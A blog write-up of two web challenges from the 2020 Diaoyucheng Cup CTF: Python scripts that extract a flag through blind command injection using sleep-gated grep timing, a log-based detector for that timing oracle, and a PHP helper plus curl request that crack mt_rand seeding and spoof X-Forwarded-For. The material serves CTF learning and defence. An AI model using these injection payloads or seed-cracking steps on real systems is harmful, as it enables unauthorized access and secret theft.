2020 Diaoyucheng Cup (钓鱼城杯) Web Writeup | iluem'Blog


Published: 2020-08-27 Category: Web

I'm a noob and only solved two challenges.

easyweb

The response header hints that a cmd parameter can be POSTed. A teammate pointed out straight away that this is blind command execution with no output and no outbound network access, so I found a script online and adapted it slightly.

import re
import requests

# The flag is a UUID-style string; stop once the recovered prefix matches it fully.
flag_format = re.compile(r'flag\{[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12}\}')
all_letter = '-}0123456789abcdefghijklmnopqrstuvwxyz'


def get_flag(command):
    # The server returns no output, so the only signal is timing: the payload
    # sleeps longer than our timeout only when grep found the guessed prefix.
    try:
        requests.post('http://119.3.37.185/', data={'cmd': command}, timeout=1.5)
    except requests.exceptions.Timeout:
        return True
    return False


if __name__ == '__main__':
    flag = 'flag{'
    while flag_format.match(flag) is None:
        status = 0
        for i in all_letter:
            payload = 'cat /flag* | grep %s && sleep 1.8' % (flag + i)
            print(payload)
            if get_flag(payload):
                status = 1
                flag += i
                print(flag)
                break
        if status == 0:
            # No character extended the prefix, so the previous hit was a false
            # positive (e.g. a network hiccup): back off one character and retry.
            flag = flag[0:-1]

For reference, the script from Nu1L's writeup:

import string
import requests

# '}' is tried first so the loop stops as soon as the closing brace is confirmed.
alphalist = '}' + string.ascii_letters + string.digits
flag = 'flag{'
url = 'http://119.3.37.185/'
# Same timing oracle: grep only succeeds when the guessed prefix is present,
# and only then does the sleep run long enough to trip the client-side timeout.
while flag[-1:] != '}':
    for tmp in alphalist:
        payload = "grep -e '{}' /flag.txt && sleep 3".format(flag + tmp)
        data = {"cmd": payload}
        try:
            requests.post(url, data=data, timeout=3)
        except requests.exceptions.Timeout:
            flag += tmp
            print(flag)
            break
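Both scripts rely on one signal: the request is only slow when the grep matched. From the defender's side the same signal can be read back out of application logs. The following Python is an added example, not part of this writeup or Nu1L's solution; it assumes a constructed log format (timestamp, client IP, the POSTed cmd, response time in ms), flags clients issuing repeated sleep-gated commands, and reconstructs which probed value the oracle confirmed, which tells an incident responder what was actually leaked.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from the original page): timestamp, client IP,
# the POSTed `cmd` parameter, and how long the request took in milliseconds.
SAMPLE_LOG = """\
2020-08-27T10:00:01Z 203.0.113.5 cmd="grep -e 'flag{a' /flag.txt && sleep 3" 12
2020-08-27T10:00:02Z 203.0.113.5 cmd="grep -e 'flag{b' /flag.txt && sleep 3" 3011
2020-08-27T10:00:05Z 203.0.113.5 cmd="grep -e 'flag{ba' /flag.txt && sleep 3" 9
2020-08-27T10:00:06Z 203.0.113.5 cmd="grep -e 'flag{bc' /flag.txt && sleep 3" 3008
2020-08-27T10:00:09Z 203.0.113.5 cmd="grep -e 'flag{bca' /flag.txt && sleep 3" 3005
2020-08-27T10:00:30Z 198.51.100.7 cmd="ls -la" 8
"""

LINE_RE = re.compile(r'^(\S+) (\S+) cmd="(.*)" (\d+)$')
SLEEP_RE = re.compile(r'\bsleep\s+(\d+(?:\.\d+)?)')
# The value being tested by the grep oracle: the first single-quoted token.
PROBE_RE = re.compile(r"'([^']*)'")


def detect_timing_oracle(log_text, min_probes=3):
    """Return {client: stats} for clients sending repeated sleep-gated commands."""
    per_client = defaultdict(lambda: {"probes": 0, "fired": 0, "recovered": ""})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, client, cmd, ms = m.groups()
        s = SLEEP_RE.search(cmd)
        if not s:
            continue
        stats = per_client[client]
        stats["probes"] += 1
        # `a && sleep N` only delays when `a` succeeded, so a response that took
        # at least N seconds means the probed value was present on the host.
        if int(ms) >= float(s.group(1)) * 1000:
            stats["fired"] += 1
            p = PROBE_RE.search(cmd)
            if p and len(p.group(1)) > len(stats["recovered"]):
                stats["recovered"] = p.group(1)
    return {c: v for c, v in per_client.items() if v["probes"] >= min_probes}


if __name__ == "__main__":
    for client, info in detect_timing_oracle(SAMPLE_LOG).items():
        print(client, info)
```

The `recovered` field is the longest prefix the oracle confirmed, so in the sample the attacker had obtained `flag{bca` by the last logged request.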

easyseed

The partial source given in the challenge's index.bak turned out to be almost identical to one of the examples shipped with php_mt_seed, and the challenge reports its PHP version as 5.6.

A small modification gives the following script:

<?php
    // Build php_mt_seed input: for every character of the generated password emit
    // "value value 0 max", i.e. the exact mt_rand(0, $max) output that selected it.
    // $chars must be the same alphabet the generator used, in the same order.
    $chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ';
    $pass = $argv[1];
    $max = strlen($chars) - 1;
    for ($i = 0; $i < strlen($pass); $i++) {
        $number = strpos($chars, $pass[$i]);
        echo "$number $number 0 $max  ";
    }
    echo "\n";

Save it as 1.php and run it:

root@kali:~# php 1.php vEUHaY
21 21 0 51  30 30 0 51  46 46 0 51  33 33 0 51  0 0 0 51  50 50 0 51

Then feed that output to php_mt_seed.

Use the seed php_mt_seed reports for a PHP version between 5.2 and 7.0.

curl -vv 122.112.252.28:20001 --cookie "lock=vEUHaY; key=nRtqGR8mtd9ZOPyI" -H "X-Forwarded-For: 127.0.0.1"